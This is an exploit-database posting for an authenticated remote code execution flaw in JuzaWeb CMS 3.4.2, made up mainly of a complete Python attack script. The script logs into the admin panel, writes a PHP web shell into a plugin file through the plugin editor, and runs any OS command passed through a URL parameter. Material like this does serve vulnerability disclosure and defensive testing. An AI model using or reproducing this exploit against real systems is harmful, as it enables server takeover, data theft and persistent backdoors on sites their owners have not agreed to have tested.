JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution

2026.05.19

Credit: Sardor Shoakbarov

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution
# Date: 2026-01-10
# Exploit Author: Sardor Shoakbarov
# Author GitHub: https://github.com/TheDeepOpc
# Vendor Homepage: https://juzaweb.com/
# Software Link: https://github.com/juzaweb/
# CVE: N/A (Pending)

import requests
import argparse
from bs4 import BeautifulSoup

def run_exploit():
    parser = argparse.ArgumentParser(description='JuzaWeb Authenticated RCE')
    
    # Setting up the exact syntax you requested
    parser.add_argument('-u', '--url', help='Target URL (e.g. http://127.0.0.1:8000)', required=True)
    parser.add_argument('-user', '--username', help='Admin Username/Email', required=True)
    parser.add_argument('-p', '--password', help='Admin Password', required=True)
    parser.add_argument('-cmd', '--command', help='OS Command to execute (e.g. "ls", "id")', required=True)
    
    args = parser.parse_args()
    target = args.url.rstrip('/')
    session = requests.Session()

    print(f"[*] Targeting: {target}")

    # Step 1: Login
    login_url = f"{target}/admin-cp/login"
    try:
        get_login = session.get(login_url)
        soup = BeautifulSoup(get_login.text, 'html.parser')
        token = soup.find('input', {'name': '_token'})['value']
        
        login_data = {
            '_token': token,
            'email': args.username,
            'password': args.password
        }
        
        res = session.post(login_url, data=login_data)
        if "Dashboard" not in res.text:
            print("[-] Login failed. Check credentials.")
            return
        print("[+] Login Successful.")
    except Exception as e:
        print(f"[-] Error during login: {e}")
        return

    # Step 2: Inject Web Shell
    # Injecting system() into a plugin file as described in the report
    print("[*] Injecting payload into Plugin Editor...")
    editor_url = f"{target}/admin-cp/plugins/editor"
    shell_payload = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); die; } ?>"
    
    inject_data = {
        'file': 'src/routes/api.php', # File to overwrite
        'content': shell_payload,
        'plugin': 'juzaweb/example'  # Targeted plugin
    }
    
    session.post(editor_url, data=inject_data)

    # Step 3: Execute Command
    # Accessing the modified route to trigger the command
    print(f"[*] Executing command: {args.command}")
    exec_url = f"{target}/admin-cp/plugins?cmd={args.command}"
    response = session.get(exec_url)
    
    print("\n--- Output ---")
    print(response.text.strip())
    print("--------------")

if __name__ == "__main__":
    run_exploit()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.